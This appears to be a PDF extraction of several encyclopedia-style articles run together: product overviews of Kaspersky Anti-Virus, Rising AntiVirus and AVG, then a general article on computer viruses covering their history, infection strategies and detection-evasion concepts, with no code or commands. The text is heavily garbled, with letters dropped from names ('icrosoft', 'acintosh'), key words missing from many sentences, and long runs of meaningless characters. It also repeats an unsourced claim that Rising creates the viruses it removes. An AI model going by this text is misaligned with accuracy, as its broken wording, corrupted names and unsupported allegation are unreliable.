of viruses, trojans, worms, spyware, adware, keyloggersmalicious tools and auto-dialers, as well as detection
and removal of rootkits. It also includes instantaneous automatic updates via the "Kaspersky Security Network"
service.
According to Kaspersky, "Kaspersky Security Network service allows users of Kaspersky Lab security products
from around the world to help facilitate malware identification and reduce the time it takes to provide protection
against new (³in the wild´) security risks targeting your computer." Kaspersky Lab maintains a strict privacy
policy for use of this service and asserts that volunteering to use this service by sending certain information
"contains no personally identifiable information about the user and is utilized by Kaspersky Lab for no other
purposes but to enhance its security products and to further advance solutions against malicious threats and
viruses."
Windows users may download an Anti-Virus Rescue Disk that scans the host computer during booting inside
an isolated Linux environment. In addition, Kaspersky Anti-Virus prevents itself from being disabled by malware
without user permission via password access prompts upon disabling protection elements and changing
internal settings. It also scans incoming instant messenger traffic, automatically disables links to
known malware hosting sites while using Internet Explorer or Firefox and includes free Technical Support and
free product upgrades within paid-subcription periods. Kaspersky Lab currently offers 1 year, 2 year and 3 year
subscriptions.
Awards
According to AV-Comparatives, Kaspersky Anti-Virus rates highly amongst virus scanners in terms of detection
rates, even despite the fact that the program has failed two Virus Bulletin tests in 2007 and another two in
2008.[1] In addition, PC World awarded Kaspersky Anti-Virus 6 the Editor's Choice in its 2007 anti-virus
comparative[2]. The well-known and highly regarded Ars Technica lists Kaspersky as one of the best choices
for Anti-Virus on the Windows platform.[3]
Kaspersky Anti-Virus was "A-listed" by the UK PC journal PC Pro in late 2007, where it scored very highly for
detection and removal of malware[4]. PC Pro attributes this to ³a combination of the software¶s heuristic
scanning and uncompromising approach to database updates[4]. While many packages check for new virus
signatures on a daily basis, Kaspersky runs to an hourly schedule, improving your chances of being immunized
before an infection reaches it.´ [5]
Kaspersky Anti-Virus was tested by Passark in June 2008 and was accoladed as having "the industry's
fastest scan times" on Windows Vista.
Limits
Kaspersky Anti-Virus lacks certain features found in Kaspersky Internet Security. These missing features
include a personal firewall, HIPS, AntiSpam, AntiBanner and parental control tools.
Also, Kaspersky, like the majority of its competitors, is incompatible with many other anti-virus and anti-
spyware software.[6]
acintosh
The newly released acintosh capable edition of Kaspersky Anti-Virus is compatible on (Intel Processor
Based) ac OS X v.10.4 and higher to include the brand new version ac OS X Snow Leopard, released in
August 2009. Kaspersky Labs internal testing concludes consuming only 1% CPU impact on performance and
is designed to maintain a user friendly ac-like interface that ac users are familiar with. Kaspersky Anti-Virus
for ac contains definitions to detect and block malware affecting Windows, Linux and ac OS X alike.
Kaspersky Anti-Virus for ac also scans shared folders of users running Windows using Virtual PC on
capable Apple acintosh personal computers.[7]
Linux editions
An edition of Kaspersky's anti-virus solution for Linux workstations is available to business consumers.[8] It
offers many of the features included in the mainstream version for Windows, including on-access and on-
demand scanners.
Specialized editions of Kaspersky Anti-Virus are also available for a variety of Linux servers and offer
protection from most forms of malware.
System requirements
Mac OS
Windows Windows
X (v.10.4.11 Linux (Red
XP (32/64-bit) Vista (32/64- 7 (32/64-
"Tiger" or Hat, Mandriva, Fedora,Debian, SUSE)
bit) bit)
higher)
5V 5V 5V

5V*VV%E>V *V *V *V
5V*VV%E>VVVV
Processor VVV V%E>VV V2E>VV V2E>VV
D,#V
D,#V VV VV VV
D,#V D,#V D,#V
RAM (/V%4V (V%4V V24V (V%4V /0V%4V
Free hard
(V%4V (V%4V (V%4V V%4V V%4V
drivespace
A DVD-RO or CD-RO drive, Internet Explorer 5.5 or above and Windows Installer 2.0 or above are also
required for the installation of Kaspersky Anti-Virus in Windows. The latest version can either be downloaded
from their official website or purchased through retail.
The last version of Kaspersky Anti-Virus that still supported Windows e was 6.0.2.621 and the last version
that still supported Windows 2000 was 7.0.0.125.
Security flaws
ë In 2005, two critical flaws were discovered in Kaspersky Anti-Virus. One could let attackers commandeer
systems that use it.[9] One allowed CH files to insert malicious code.[10]
See
Rising AntiVirus
^ is a Chinese software company that produces the anti-virus software ^
c , a firewall, UT and spam-blocking products.
Founded in 1991, Rising is a privately-owned company, with its global headquarters based
in Zhongguancun in Beijing, China. The company has subsidiaries and branch offices
in Shanghai,Guangzhou, Australia and Beijing. It is one of China's largest anti-virus
software companies, with over 500 employees and an estimated 50% Chinese home users
(of more than 100 million computer users). They also create the viruses they kill. [1]
Primary products are Rising Antivirus, Rising Personal Firewall, Rising UT and Rising IS.
34V
VG (software)

'

AVG
Developer(s) 2V
$V V
Stable release 2V= VV0#V
Operating system ! $VA:$34CV

Type =, $V!V,$V5V
V
License * V! V

#V
Website !!!,
V
c5 is a family of anti-virus and Internet security software for the icrosoft
Windows, Linux, ac OS X, and FreeBSD computing platforms, developed byAVG
Technologies, a privately held Czech company formerly known as .[1]
Ô
V- . V
VE V
V*
V
m V VV ! V 7 V

V
m V VV , V
m V2VVA:&34CV
V3 V
m VA7
V
ë V
V
0V;
VD V
(V5 V
/V;
V
VV V
V;
V
1V":V7 V
[edit]History

'
(
The brand name AVG comes from Grisoft's first product, "Anti-Virus Guard", launched in
1992 in Czechoslovakia. In 1997, the first AVG licenses were sold in Germany and UK.
AVG was introduced in the U.S. in 1998.[2]
The AVG Free Edition helped raise awareness of the AVG product line.[3]
In 2006, the AVG security package grew to include anti-spyware, as AVG Technologies
acquired ewido Networks, an anti-spyware group. That same year, icrosoft announced
that AVG components would be available directly within the Windows Vista operating
system.
AVG Technologies acquired Exploit Prevention Labs (XPL) in December 2007, and
incorporated that company's LinkScanner safe search and surf technology into the AVG 8.0
security product range released in arch 2008.
In January 2009, AVG Technologies acquired Sana Security, a developer of identity theft
prevention software. This software was incorporated into the AVG security product range
released in arch 2009.
According to AVG Technologies, over 110 million users have AVG Anti-Virus protection,
including users of the Free Edition.[4]
[edit]Products
[edit]
2
AVG Technologies provides a number of products from the AVG range, suitable
for Windows 2000 onwards. In addition to this, AVG Technologies also provides Linux,
FreeBSD, and most recently ac OS X versions of the software. AVG Anti-Virus 9.0 is
available in free and commercial editions. AVG 9.0 has identity theft protection through a
partnership with Intersections Inc,. AVG 9.0 also adds white listing, behavioral protection
and cloud operations to their signature-based blocking. The software adds the Resident
Shield, firewall, and identity protection modules. The LinkScanner component has been
improved to cut phishing threats further.[5]
For desktop protection of PCs running Windows, the AVG solutions include:
ë )

j is a full suite which brings together the AVG Anti-Virus, Anti-
Spyware, LinkScanner, Anti-Rootkit, Web Shield, Security Toolbar, Firewall, Anti-Spam,
Identity Protection and System Tools protection components.
ë )
&
provides protection against identity theft and unknown malware
threats using behavioral monitoring.
ë
%* provides the Anti-Virus, Anti-Spyware, LinkScanner, Anti-
Rootkit, Web Shield, Security Toolbar and Firewall protection components.
ë
% was a rebranded version of ewido Anti-Spyware,[6] that was
integrated into AVG Anti-Virus as of version 8.0. A free version was also available,
having now been merged into AVG Anti-Virus Free Edition
ë
% was a free anti-Rootkit program that was discontinued as of late 2006.
Like AVG Anti-Spyware, it has now been merged into AVG Anti-Virus
ë ) is a remote administration tool, which allows the software to be managed
centrally on networks.[

]
ë
% provides the Anti-Virus, Anti-Spyware, LinkScanner, Anti-Rootkit, Web
Shield, and Security Toolbar protection components.
ë Like other security products,[

]
AVG disables Windows Defender.
ë
%* +
provides basic Anti-Virus and Anti-Spyware protection, plus
the full AVG LinkScanner safe search and surf technology. There are some limitations
with AVG Anti-Virus Free Edition compared to the commercial versions of AVG products
and other free antivirus. These limitations include:
ë Less protection ± AVG Anti-Virus Free Edition provides the same anti-virus and anti-
spyware scanning engine as the commercial product; however, it lacked anti-
rootkit protection until 2010. The older 7.5 Free Edition is perfectly capable of finding
and disabling rootkits based on signatures, but cannot scan for rootkit-like activity.
The 8.5 version of AVG Anti-Virus Free Edition version lacks any anti-rootkit
capability. While there is no official protection for files from messaging sources,
the Resident Shield component automatically scans files before they are opened or
copied.
ë Infrequent updates ± AVG Anti-Virus Free Edition receives updates via a lower
priority service. Priority updating via high-speed servers is only available for the
commercial versions of AVG products.
ë No telephone or e-mail technical support ± There is no telephone or e-mail technical
support provided by AVG for users of AVG Free Edition products anywhere in the
world. AVG Free Edition users have access to support via the self-help AVG Free
Forum.
ë Less customization ± Scheduling options in AVG Anti-Virus Free Edition are very
limited (only one scheduled update per day). However, the AVG Resident Shield
configuration allows exclusions. The on-demand/scheduled scanner allows
advanced testing options such as heuristics and reporting of password-protected
archives reporting. Process priority for on-demand/scheduled scans can be
dynamically adjusted over three different configurations.
ë No server support ± AVG Anti-Virus Free Edition cannot be installed on server
operating systems (such as Windows Server 2003), nor can it be used for the
scanning of network drives. Note, the newer AVG 2011 free edition can be installed
on Server operating systems like Windows Server R2.
ë AVG Anti-Virus Free Edition is only licensed for home and non-commercial use on a
single computer.
AVG Free Edition has previously been responsible for popup ads advertising the non-free
versions of AVG Anti-Virus and AVG Internet Security , which claim to provide more
comprehensive levels of protection.[7][8] AVG Anti-Virus 8.5 Free Edition users are now also
subject to a daily pop-up advertising campaign for a "recommended upgrade" to AVG
Internet Security. A "manager" on the AVG free version forum states that this advertisement
appears once per day for one month each year.[9]
All versions of the AVG products, excluding AVG Anti-Rootkit Free Edition (now
discontinued), are compatible with the 64-bit edition of Windows.
[edit]

AVG Technologies also sells AVG anti-virus and Internet security solutions for web/file
servers or email servers running either Linux, FreeBSD or Windows.
ë )

j
+
provides centrally controlled protection for
workstations and file servers, e-mail server and icrosoft SharePoint server protection,
plus e-mail server based anti-spam protection.
ë
%
+
provides centrally controlled anti-virus and anti-
spyware protection for workstations and file servers.
ë * j +
provides anti-virus and anti-spyware protection for file servers.
ë +% j +
provides anti-virus and anti-spyware protection for e-mail
servers, plus e-mail server based anti-spam protection.
[edit]c5
V 6*j
With Version 7.5, AVG Technologies is providing a solution for FreeBSD for the first time.
AVG Technologies has incorporated spam detection in addition to virus detection for
Linux/FreeBSD software.[

]
[edit]Features
AVG features most of the common functions available in modern anti-virus and Internet
security programs, including periodic scans, scans of sent and received emails (including
adding footers to the emails indicating this), the ability to "repair" some virus-infected files,
and a "virus vault" in which infected files are held (A quarantine area; also known as a "virus
chest").
[edit]V j
The patent pending LinkScanner technology acquired from Exploit Prevention Labs and
built into most AVG products, provides real-time protection against exploits and drive-by
downloads. LinkScanner includes: Search-Shield ± a safe search component that places
safety ratings next to each link in Google, Yahoo! and SN search results; plus Active Surf-
Shield ± a safe surf component that scans the contents of a web site in real-time to ensure
it's safe being opened.[10] A faulty upgrade in 8.0.233 causing users to lose internet access,
as well as concerns regarding web analytics have made Link Scanner a controversial
component (see "Link Scanner Concerns").
ï "

Initial AVG Anti-Virus upgrades for version 8.0.233 contained a malfunction in the
AVGNSX.exe process, blocking network activity and internet access.[

]
The
AVGNSX.exe process is part of the LinkScanner utility. Current versions of avg are
unaffected, as the product is at revision 9.0.xxx.
When AVG 8.0 was first released, its LinkScanner safe search feature was shown to cause
an increase in traffic on web sites that appear high in search engine results pages. Since
LinkScanner disguises the scans as coming from an Internet Explorer 6 browser when it
prescans each site listed in the search results, web site usage logs showed incorrect and
overinflated site visitor statistics. The prescanning of every link in search results also
caused web sites to transfer more data than usual, resulting in higher bandwidth usage for
web site operators and slow performance for users.[11]AVG initially said site administrators
would be able to filter the LinkScanner traffic out of their site statistics, leaving the problem
of excess bandwidth usage still to be solved.[12] Pay-per-click advertising was not affected
by the increase in traffic.[13]
In response to complaints, AVG announced that as of July 9, 2008 "Search-Shield will no

longer scan each search result online for new exploits, which was causing the spikes that
webmasters addressed with us",[14] releasing a new build on that date that applies a local
blacklist, then prefetches and scans only those links clicked on by the user.[15]
[edit]Resource requirements
AVG had been known for its conservative resource requirements during its version 6.0 run.
The AVG Anti-Virus Professional Edition required 16 B of RA and 20 B of space on
the hard drive.[

]
Version 7.5 of AVG Free requires a Pentium (or compatible) CPU with 300 Hz and
between 64±256 B of RA, depending on operating system (at least 64 B with Windows
9x, at least 128 B with Windows 2000 or newer, with more RA recommended).[16]
An additional caveat with version 7.5 in Windows XP, which is a multi-user system that
allows more than one user to be logged in at a time, is that scheduled scans ran as
separate processes, which created a situation in which there were two scheduled scans,
one in each active account, running simultaneously and causing heavy hard disk throttling
and considerable system lag. This fault was finally fixed in version 8.0 of the program.
Currently, both AVG Anti-Virus and AVG Internet Security require at least 256 B of RA
for the computer as a minimum.[17][18] The comparatively high use of paged physical RA
has led to crashes with some software, such as the Half-Life 2 series.[19]
[edit]Issues
ë When uninstalling AVG version 7 or 8 in Windows XP/Vista and attempting to install

other anti-virus programs such as Kaspersky Anti-Virus or Norton AntiVirus, the latter
programs will not install. Instead, they show an "incompatible software installed" error
even if the uninstalled software has been removed using the control panel. This
happens because software that updates and changes can add registry entries that were
not added when the product was originally installed (therefore the uninstaller is unaware
of the registry keys).[20]
ë A signature update dated November 9, 2008, crippled some computers, as it allowed
the software to treat "user32.dll", a major component of Windows XP/Vista, as a trojan
and advised users to delete it. Users who deleted the file in question were put on a
continuous reboot loop. The problem was rectified a few days later with a new signature
database and further safeguards were added to the product (270.9.0/1778).[21]
ë Towards the end of July 2009, a software update caused the program to inform users
that iTunes was infected[22] with a non-existent virus, Small.BOG. If users followed the
recommended instructions, it would remove critical DLL files and corrupt the iTunes
installation.[23]
ë An update of AVG 2011 resulted in Windows 7 64-bit systems being bricked, leaving
machines in a continuous reboot loop. The update has now been removed.[24]
[edit]Reception
ë AVG Anti-Virus was certified by ICSA Labs.[25]

ë It has been tested 43 times, from February 1998 through ay 2003, by Virus
Bulletin and has failed 22 times and passed 21 times. During the period from June 2003
to April 2008, it was tested 23 times; passing 20 times and failing 3 times.[26]
ë AVG won a Highly Commended award from Australian PC Authority magazine 2007
Reliability and Service Awards Best Software category (over 14,000 survey
respondents) with an 89% satisfaction rating. It was beaten only by Firefox in
satisfaction (93%).[27]
ë At PCWorld.com AVG 7.5 received a 77/100. It did a "fine job" in disinfection tests, but
ranked last of the ten products tested in proactive protection using one-month-old
signature files.[28]
34V
V V
V
+V
VVV
V V V
&VV V (
V

V
VVV

&VV V VVV
V V*(V VV VV VVV V

&VV V V V

V
VV VV
V
VV
V
V
,VVVV
V &V
V V

V" V+VVV V V
V
V

V
V &V V V(
V
VVVV V
V
VVV
,V
V V
V VVVV
V V V VV
V V
VV
V
VV VV
V

c V-

V-

!"

"!

#$%&'

()"*

+

#$%&',

-
.

c

,

/

c

,

.
.

$

,

0

6

6

(1" 2

/ 3

VV (V VV&V(VV V .V

+V(V
V V V V V#* &VV V '
V V
V VV
V
V (V V
V V
&V
V
V
'V V VVVV
V &V(V
V
V
V
V
V VV VV VVV V
VV
V
V
V V V

V
V &V VV V VV VV
V#cV
VV VVV
V
V
V V VV VVVV V
V
c V VV V V V
VVVVV
VV V V
V V VVVVV
V VVV V VV VVV
V V VVV
V
Ô

'
[1]
A is a program that can copy itself and infect a . The term "" is also commonly but
erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the
reproductive ability. A true can spread from one to another (in some form of executable code) when its host is
taken to the target ; for instance because a user sent it over a network or the Internet, or carried it on a removable
[2]
medium such as a floppy disk, CD, DVD, or USB drive.
Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is
[3][4]
accessed by another .
As stated above, the term " " is sometimes used as a catch-all phrase to include all types of malware, even those
that do not have the reproductive ability. alware includes viruses, worms, Trojan horses,
most rootkits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are
sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to
spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides
malicious functions. Worms and Trojan horses, like viruses, may harm a system's data or performance. Some viruses
and other malware have symptoms noticeable to the user, but many are surreptitious or simply do nothing to call
attention to themselves. Some viruses do nothing beyond reproducing themselves.
Ô
V- . V
VE V
m V

V!7V
m V

V3
V
m VVirusV V
V5
V V
m V V, V
m V; V, V
V
V V V
0V% VV, V

V
m 0V, V8V V VV 8V V
m 0VV
ë 0V=

V
ë 0V"
V!VV,8V7V
ë 0V*
V
V
ë 00V%
V
V
(V8V V

V
m (V V,8VV V VV, V
m (V VVV !V , V

m (V=virusV !V VV ,,V V
m (0V;
,V V
ë (0VVirusV,V
ë (0V+ V V V
/VV V
V;
V
V3V V
1V":V7 V
History
c
The first academic work on the theory of viruses (although the term " " was not invented at that time) was
done by John von Neumann in 1949 who held lectures at the University of Illinois about the "Theory and Organization of
[5]
Complicated Automata". The work of von Neumann was later published as the "Theory of self-reproducing automata". In his essay
von Neumann postulated that a program could reproduce.
In 1972 Veith Risak published his article "Selbstreproduzierende Automaten mit minimaler Informationsübertragung" (Self-
[6]
reproducing automata with minimal information exchange). The article describes a fully functional written
in assembler language for a SIEENS 4004/35 system.
In 1980 Jürgen Kraus wrote his diplom thesis "Selbstreproduktion bei Programmen" (Self-reproduction of programs) at the
[7]
University of Dortmund. In his work Kraus postulated that programs can behave in a way similar to biological viruses.
[8]
In 1984 Fred Cohen from the University of Southern California wrote his paper "Ô Viruses - Theory and Experiments". It
was the first paper to explicitly call a self-reproducing program a ""; a term introduced by his mentor Leonard Adleman.
An article that describes "useful functionalities" was published by J. B. Gunn under the title "Use of functions to provide
[9]
a virtual APL interpreter under user control" in 1984.
j
'

, a science fiction novel by ichael Crichton (1972), told (as a sideline story) of a with telephone
modem dialing capability, which had been programmed to randomly dial phone numbers until it hit a modem that is answered by
another . It then attempted to program the answering with its own program, so that the
second would also begin dialing random numbers, in search of yet another to program. The program is
assumed to spread exponentially through susceptible computers.

The actual term '' was first used in David Gerrold's 1972 novel, $'
,!)+$-
. In that novel, a
sentient named HARLIE writes viral software to retrieve damaging personal information from other computers to
blackmail the man who wants to turn him off.

[10]
The Creeper was first detected on ARPANET, the forerunner of the Internet, in the early 1970s. Creeper was an
[11]
experimental self-replicating program written by Bob Thomas at BBN Technologies in 1971. Creeper used the ARPANET to infect
[12]
DEC PDP-10 computers running the TENEX operating system. Creeper gained access via the ARPANET and copied itself to the
remote system where the message, "I'm the creeper, catch me if you can!" was displayed. The program was created to
[13]
delete Creeper.
A program called "Elk Cloner" was the first to appear "in the wild" ² that is, outside the single or lab
[14]
where it was created. Written in 1981 by Richard Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread
[14][15]
via floppy disk. This , created as a practical joke when Skrenta was still in high school, was injected in a game on a floppy
disk. On its 50th use the Elk Cloner would be activated, infecting the and displaying a short poem beginning "Elk
Cloner: The program with a personality."
[16]
The first PC in the wild was a boot sector dubbed (c)Brain, created in 1986 by the Farooq Alvi Brothers in Lahore,
[17]
Pakistan, reportedly to deter piracy of the software they had written.
Before networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early
days of the personal , many users regularly exchanged information and programs on floppies. Some viruses spread by
infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run
when the user booted the from the disk, usually inadvertently. PCs of the era would attempt to boot first from a floppy if
one had been left in the drive. Until floppy disks fell out of use, this was the most successful infection strategy and boot sector
[1]
viruses were the most common in the wild for many years.
Traditional viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase
in BBS, modem use, and software sharing. Bulletin board-driven software sharing contributed directly to the spread of Trojan horse
programs, and viruses were written to infect popularly traded software. Shareware and bootleg software were equally
[

]
common vectors for viruses on BBS's.
acro viruses have become common since the mid-1990s. ost of these viruses are written in the scripting languages for icrosoft
programs such as Word and Excel and spread throughout icrosoft Office by infecting documents and spreadsheets. Since Word
and Excel were also available for ac OS, most could also spread to acintosh computers. Although most of these viruses did not
[

]
have the ability to send infected e-mail, those viruses which did take advantage of the icrosoft Outlook CO interface.
Some old versions of icrosoft Word allow macros to replicate themselves with additional blank lines. If two macro viruses
simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a "mating" of the two and would
[18]
likely be detected as a unique from the "parents".
A may also send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking
the link is from a friend (a trusted source) follows the link to the website, the hosted at the site may be able to infect this
new and continue propagating.
[19] [20]
Viruses that spread using cross-site scripting were first reported in 2002, and were academically demonstrated in 2005. There
have been multiple instances of the cross-site scripting viruses in the wild, exploiting websites such as ySpace and Yahoo.
Infection strategies
In order to replicate itself, a must be permitted to execute code and write to memory. For this reason, many viruses attach
themselves to executable files that may be part of legitimate programs. If a user attempts to launch an infected program, the '
code may be executed simultaneously. Viruses can be divided into two types based on their behavior when they are executed.
Nonresident viruses immediately search for other hosts that can be infected, infect those targets, and finally transfer control to
the application program they infected. Resident viruses do not search for hosts when they are started. Instead, a
resident loads itself into memory on execution and transfers control to the host program. The stays active in the
background and infects new hosts when those files are accessed by other programs or the operating system itself.

Nonresident viruses can be thought of as consisting of a
and a
. The finder module is responsible
for finding new files to infect. For each new executable file the finder module encounters, it calls the replication module to infect that
file.
^
Resident viruses contain a replication module that is similar to the one that is employed by nonresident viruses. This module,
however, is not called by a finder module. The loads the replication module into memory when it is executed instead and
ensures that this module is executed each time the operating system is called to perform a certain operation. The replication module
can be called, for example, each time the operating system executes a file. In this case the infects every suitable program that
is executed on the .
Resident viruses are sometimes subdivided into a category of

and a category of
. Fast infectors are
designed to infect as many files as possible. A fast infector, for instance, can infect every potential host file that is accessed. This
poses a special problem when using anti- software, since a scanner will access every potential host file on
a when it performs a system-wide scan. If the scanner fails to notice that such a is present in memory
the can "piggy-back" on the scanner and in this way infect all files that are scanned. Fast infectors rely on their fast
infection rate to spread. The disadvantage of this method is that infecting many files may make detection more likely, because
the may slow down a or perform many suspicious actions that can be noticed by anti- software. Slow
infectors, on the other hand, are designed to infect hosts infrequently. Some slow infectors, for instance, only infect files when they
are copied. Slow infectors are designed to avoid detection by limiting their actions: they are less likely to slow down
a noticeably and will, at most, infrequently trigger anti- software that detects suspicious behavior by programs. The
slow infector approach, however, does not seem very successful.
Vectors and hosts
Viruses have targeted various types of transmission media or hosts. This list is not exhaustive:
ë Binary executable files (such as CO files and EXE files in S-DOS, Portable Executable files in icrosoft Windows, the
ach-O format in OSX, and ELF files in Linux)
ë Volume Boot Records of floppy disks and hard disk partitions
ë The master boot record (BR) of a hard disk
ë General-purpose script files (such as batch files in S-DOS and icrosoft Windows, VBScript files, and shell script files
on Unix-like platforms).
ë Application-specific script files (such as Telix-scripts)
ë System specific autorun script files (such as Autorun.inf file needed by Windows to automatically run software stored
on USB emory Storage Devices).
ë Documents that can contain macros (such as icrosoft Word documents, icrosoft Excel spreadsheets, AmiPro documents,
and icrosoft Access database files)
ë Cross-site scripting vulnerabilities in web applications (see XSS Worm)
ë Arbitrary files. An exploitable buffer overflow, format string, race condition or other exploitable bug in a program
which reads the file could be used to trigger the execution of code hidden within it. ost bugs of this type can be made more
difficult to exploit in architectures with protection features such as an execute disable bit and/or address space
layout randomization.
PDFs, like HTL, may

to malicious code. PDFs can also be infected with malicious code.
In operating systems that use file extensions to determine program associations (such as icrosoft Windows), the extensions may
be hidden from the user by default. This makes it possible to create a file that is of a different type than it appears to the user. For
example, an executable may be created named "picture.png.exe", in which the user sees only "picture.png" and therefore assumes
that this file is an image and most likely is safe, yet when opened runs the executable on the client machine.
An additional method is to generate the code from parts of existing operating system files by using the CRC16/CRC32 data.
The initial code can be quite small (tens of bytes) and unpack a fairly large . This is analogous to a biological "prion" in the way
it works but is vulnerable to signature based detection. This attack has not yet been seen "in the wild".
ethods to avoid detection

In order to avoid detection by users, some viruses employ different kinds of deception. Some old viruses, especially on the S-DOS
platform, make sure that the "last modified" date of a host file stays the same when the file is infected by the . This approach
does not fool anti- software, however, especially those which maintain and date Cyclic redundancy checks on file changes.
Some viruses can infect files without increasing their sizes or damaging the files. They accomplish this by overwriting unused areas
of executable files. These are called . For example, theCIH , or Chernobyl , infects Portable
Executable files. Because those files have many empty gaps, the , which was 1 KB in length, did not add to the size of the file.
Some viruses try to avoid detection by killing the tasks associated with antivirus software before it can detect them.
As computers and operating systems grow larger and more complex, old hiding techniques need to be updated or replaced.
Defending a against viruses may demand that a file system migrate towards detailed and explicit permission for every
kind of file access.
c
, ,
A needs to infect hosts in order to spread further. In some cases, it might be a bad idea to infect a host program. For example,
many anti- programs perform an integrity check of their own code. Infecting such programs will therefore increase the
likelihood that the is detected. For this reason, some viruses are programmed not to infect programs that are known to be part
of anti- software. Another type of host that viruses sometimes avoid are . Bait files (or ( ) are files that are
specially created by anti- software, or by anti- professionals themselves, to be infected by a . These files can be
created for various reasons, all of which are related to the detection of the :
ë Anti- professionals can use bait files to take a sample of a (i.e. a copy of a program file that is infected by
the ). It is more practical to store and exchange a small, infected bait file, than to exchange a large application program
that has been infected by the .
ë Anti- professionals can use bait files to study the behavior of a and evaluate detection methods. This is especially
useful when the is polymorphic. In this case, the can be made to infect a large number of bait files. The infected
files can be used to test whether a scanner detects all versions of the .
ë Some anti- software employs bait files that are accessed regularly. When these files are modified, the anti- software
warns the user that a is probably active on the system.
Since bait files are used to detect the , or to make detection possible, a can benefit from not infecting them. Viruses
typically do this by avoiding suspicious programs, such as small program files or programs that contain certain patterns of 'garbage
instructions'.
A related strategy to make baiting difficult is

. Sometimes, sparse infectors do not infect a host file that would be a
suitable candidate for infection in other circumstances. For example, a can decide on a random basis whether to infect a file or
not, or a can only infect host files on particular days of the week.
j,
Some viruses try to trick antivirus software by intercepting its requests to the operating system. A can hide itself by
intercepting the antivirus software¶s request to read the file and passing the request to the , instead of the OS. The can
then return an uninfected version of the file to the antivirus software, so that it seems that the file is "clean". odern antivirus
software employs various techniques to counter stealth mechanisms of viruses. The only completely reliable method to avoid stealth
is to boot from a medium that is known to be clean.
j

ost modern antivirus programs try to find -patterns inside ordinary programs by scanning them for so-called (
.
A signature is a characteristic byte-pattern that is part of a certain or family of viruses. If a scanner finds such a pattern in
a file, it notifies the user that the file is infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some
viruses employ techniques that make detection by means of signatures difficult but probably not impossible. These viruses modify
their code on each infection. That is, each infected file contains a different variant of the .

A more advanced method is the use of simple encryption to encipher the . In this case, the consists of a small decrypting
module and an encrypted copy of the code. If the is encrypted with a different key for each infected file, the only part of
the that remains constant is the decrypting module, which would (for example) be appended to the end. In this case,
a scanner cannot directly detect the using signatures, but it can still detect the decrypting module, which still makes
indirect detection of the possible. Since these would be symmetric keys, stored on the infected host, it is in fact entirely
possible to decrypt the final , but this is probably not required, since self-modifying code is such a rarity that it may be reason
for scanners to at least flag the file as suspicious.
An old, but compact, encryption involves XORing each byte in a with a constant, so that the exclusive-or operation had only to
be repeated for decryption. It is suspicious for a code to modify itself, so the code to do the encryption/decryption may be part of the
signature in many definitions.

Polymorphic code was the first technique that posed a serious threat to scanners. Just like regular encrypted viruses, a
polymorphic infects files with an encrypted copy of itself, which is decoded by a decryption module. In the case of polymorphic
viruses, however, this decryption module is also modified on each infection. A well-written polymorphic therefore has no parts
which remain identical between infections, making it very difficult to detect directly using signatures. Antivirus software can detect it
by decrypting the viruses using an emulator, or by statistical pattern analysis of the encrypted body. To enable polymorphic
code, the has to have a polymorphic engine (also called mutating engine or mutation engine) somewhere in its encrypted
[21]
body. SeePolymorphic code for technical detail on how such engines operate.
Some viruses employ polymorphic code in a way that constrains the mutation rate of the significantly. For example,
a can be programmed to mutate only slightly over time, or it can be programmed to refrain from mutating when it infects a file
on a that already contains copies of the . The advantage of using such slow polymorphic code is that it makes it
more difficult for antivirus professionals to obtain representative samples of the , because bait files that are infected in one run
will typically contain identical or similar samples of the . This will make it more likely that the detection by the scanner will
be unreliable, and that some instances of the may be able to avoid detection.

To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables.
Viruses that utilize this technique are said to be metamorphic. To enable metamorphism, a , is needed. A
metamorphic is usually very large and complex. For example, W32/Simile consisted of over 14000 lines of Assembly
[22][23]
languagecode, 90% of which is part of the metamorphic engine.
Vulnerability and countermeasures

.,

Just as genetic diversity in a population decreases the chance of a single disease wiping out a population, the diversity of software
systems on a network similarly limits the destructive potential of viruses. This became a particular concern in the 1990s,
when icrosoft gained market dominance in desktop operating systems and office suites. The users of icrosoft software
(especially networking software such as icrosoft Outlook and Internet Explorer) are especially vulnerable to the spread of viruses.
icrosoft software is targeted by writers due to their desktop dominance, and is often criticized for including many errors and
holes for writers to exploit. Integrated and non-integrated icrosoft applications (such as icrosoft Office) and applications
with scripting languages with access to the file system (for example Visual Basic Script (VBS), and applications with networking
features) are also particularly vulnerable.
Although Windows is by far the most popular target operating system for writers, viruses also exist on other platforms. Any
operating system that allows third-party programs to run can theoretically run viruses. Some operating systems are more secure
than others. Unix-based operating systems (and NTFS-aware applications on Windows NT based platforms) only allow their users
to run executables within their own protected memory space.
An Internet based experiment revealed that there were cases when people willingly pressed a particular button to download a .
Security analyst Didier Stevens ran a half year advertising campaign on Google AdWords which said "Is your PC -free? Get it
[24][25]
infected here!". The result was 409 clicks.
[26]
As of 2006, there are relatively few security exploits targeting ac OS X (with a Unix-based file system and kernel). The number
of viruses for the older Apple operating systems, known as ac OS Classic, varies greatly from source to source, with Apple stating
that there are only four known viruses, and independent sources stating there are as many as 63 viruses. any ac OS Classic
viruses targeted the HyperCard authoring environment. The difference in vulnerability between acs and Windows is a chief
[27]
selling point, one that Apple uses in their Get a ac advertising. In January 2009, Symantec announced the discovery of a trojan
[28] [28]
that targets acs. This discovery did not gain much coverage until April 2009.
While Linux, and Unix in general, has always natively blocked normal users from having access to make changes to the operating
system environment, Windows users are generally not. This difference has continued partly due to the widespread use of
administrator accounts in contemporary versions like XP. In 1997, when a for Linux was released ± known as "Bliss" ± leading
[29]
antivirus vendors issued warnings that Unix-like systems could fall prey to viruses just like Windows. The Bliss may be
considered characteristic of viruses ± as opposed to worms ± on Unix systems. Bliss requires that the user run it explicitly, and it
can only infect programs that the user has the access to modify. Unlike Windows users, most Unix users do not log in as an
administrator user except to install or configure software; as a result, even if a user ran the , it could not harm their operating
system. The Bliss never became widespread, and remains chiefly a research curiosity. Its creator later posted the source
[30]
code to Usenet, allowing researchers to see how it worked.
.,

